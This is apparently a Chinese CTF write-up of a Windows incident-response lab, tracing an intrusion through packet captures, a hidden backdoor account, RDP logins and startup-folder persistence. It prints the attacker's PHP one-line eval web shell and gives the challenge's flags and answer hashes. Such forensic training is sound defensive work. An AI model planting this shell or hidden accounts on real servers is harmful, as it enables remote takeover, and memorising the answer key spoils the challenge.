【CTF】暗魂CTF平台-windows应急响应-writeup

WriteUp 2周前 admin
28 0 0
点击蓝字
【CTF】暗魂CTF平台-windows应急响应-writeup
关注我们

【CTF】暗魂CTF平台-windows应急响应-writeup



【CTF】暗魂CTF平台-windows应急响应-writeup

【CTF】暗魂CTF平台-windows应急响应-writeup
微信搜一搜
【CTF】暗魂CTF平台-windows应急响应-writeup
暗魂攻防实验室

题目描述

A集团的应用服务器被黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。


0x01 任务1

提交攻击者IP地址的MD5值,提交的值无需使用flag{}

首先登录目标主机后,桌面上有wireshark文件,因为是web攻击,打开后筛选http的流量,查看所有HTTP的流量发现大多数都是192.168.192.1和192.168.192.132的通信流量,且右键追踪之后可知192.168.192.132为目标服务器的站点,所以攻击者地址为192.168.192.1

【CTF】暗魂CTF平台-windows应急响应-writeup

转换MD5值是 6729fb3ef240c05a7037797ba7a97fcf

【CTF】暗魂CTF平台-windows应急响应-writeup


0x02 任务2

攻击者最先使用了什么攻击(例:SQL注入)

通过对数据包的分析,可知一直在GET一些看起来诡异的路径

【CTF】暗魂CTF平台-windows应急响应-writeup

看起来就是在对目录进行扫描,所以最先使用了目录扫描攻击



0x03 任务3

网站根目录robots.txt内的内容是什么

这题很简单,去看看里面有没有搭建的网站,看到有phpstudy啥的就直接点进去看,或者直接C盘根目录搜索robots.txt

【CTF】暗魂CTF平台-windows应急响应-writeup


答案为:flag{hbrj6666666666666666}


0x04 任务4

攻击者通过那个路径进行的上传文件

通过筛选HTTP流,目录扫描完成后就开始上传文件,可以看到上传的路径为:/plugins/upload/uploadimg.php?fp=upimg且上传了一句话木马

【CTF】暗魂CTF平台-windows应急响应-writeup


0x05 任务5

提交攻击者上传的后门文件内容的MD5值

上个任务就看到了上传的一句话木马

<?php @eval($_POST['hbrj']);?>

转成MD5:8a451c642e3e0d946d18ab5d1a8891c7

【CTF】暗魂CTF平台-windows应急响应-writeup


0x06 任务6

提交攻击者创建的后门用户的MD5值

通过net user可以看到创建的用户,但是没有发现

【CTF】暗魂CTF平台-windows应急响应-writeup

控制面板的用户账户其实也能看到创建的用户,同时也发现用户名加了$符号,表示隐藏用户

【CTF】暗魂CTF平台-windows应急响应-writeup

包括计算机管理中的本地用户和组也可以发现

【CTF】暗魂CTF平台-windows应急响应-writeup

所以创建的后门用户为:hbrj$

转成MD5:9f7888bd5f117f82523ee532faf16b0a

【CTF】暗魂CTF平台-windows应急响应-writeup


0x07 任务7

攻击者什么时间创建的后门账户[答案格式:2023/03/04/11:11:11]

也很简单,cmd直接net user hbrj$,上次设置密码时间其实就是用户创建时间

【CTF】暗魂CTF平台-windows应急响应-writeup

0x08 任务8

攻击者利用哪个端口进行登录了服务器

这个题看到有创建系统用户的,一般可能性最大的就是直接3389远程桌面登录

可以看下主机是否开放监听了3389端口,netstat -a,确实看到3389开放了

【CTF】暗魂CTF平台-windows应急响应-writeup

如果实在不确定的话直接mstsc验证一下就行了

【CTF】暗魂CTF平台-windows应急响应-writeup


0x09 任务9

攻击者第一次登录时间为 [答案格式:2023/03/04/11:11:11]

这个在第七个任务的时候就显示了(显示的是上次登录时间),但是就只登录了一回,真实情况下应该不只一次登录,严格来讲需要分析windows日志,筛选登录成功的事件ID 4624去看第一次的登录时间。

所以答案是:2024/05/15/11:21:05

【CTF】暗魂CTF平台-windows应急响应-writeup


0x10 任务10

攻击者隐藏的后门文件的名称 [答案格式:xxx.exe]

这题如果是没有免杀的后门,直接杀毒软件就能查到,有免杀的话,就看看有没有在运行的可疑的进程,如果弄了权限维持的话,可以检查一下开机启动项。注意开机启动项有挺多地方可以设置的,注册表和一些操作系统里面的用户或者操作系统启动项文件夹,比如

cmd输入shell:startup
C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

如果不想那么麻烦的话直接开D盾扫扫,在新版本2.1.8.1的D盾是有启动项检查的功能,老版本没有

找到了hbrj.exe,目录在

C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp

【CTF】暗魂CTF平台-windows应急响应-writeup

0x11 任务11

攻击者在注册表隐藏的flag为

在做任务10其实就意外发现了flag,就是在注册表上的开机启动项的路径下

【CTF】暗魂CTF平台-windows应急响应-writeup





【CTF】暗魂CTF平台-windows应急响应-writeup
联系微信客服
扫码联系
暗魂攻防实验室


【CTF】暗魂CTF平台-windows应急响应-writeup


【CTF】暗魂CTF平台-windows应急响应-writeup

【CTF】暗魂CTF平台-windows应急响应-writeup

暗魂CTF平台-工控-协议分析-writeup

暗魂攻防实验室CTF平台工控题writeup

暗魂攻防实验室CTF平台基础赛题-writeup

【CTF比赛版】anhunsec_ctf_v2.0 比赛专属系统正式发布!

【CTF】暗魂CTF平台-windows应急响应-writeup
【CTF】暗魂CTF平台-windows应急响应-writeup
微信搜一搜
【CTF】暗魂CTF平台-windows应急响应-writeup
暗魂攻防实验室


原文始发于微信公众号(暗魂攻防实验室):【CTF】暗魂CTF平台-windows应急响应-writeup

版权声明:admin 发表于 2024年9月19日 下午1:48。
转载请注明:【CTF】暗魂CTF平台-windows应急响应-writeup | CTF导航

相关文章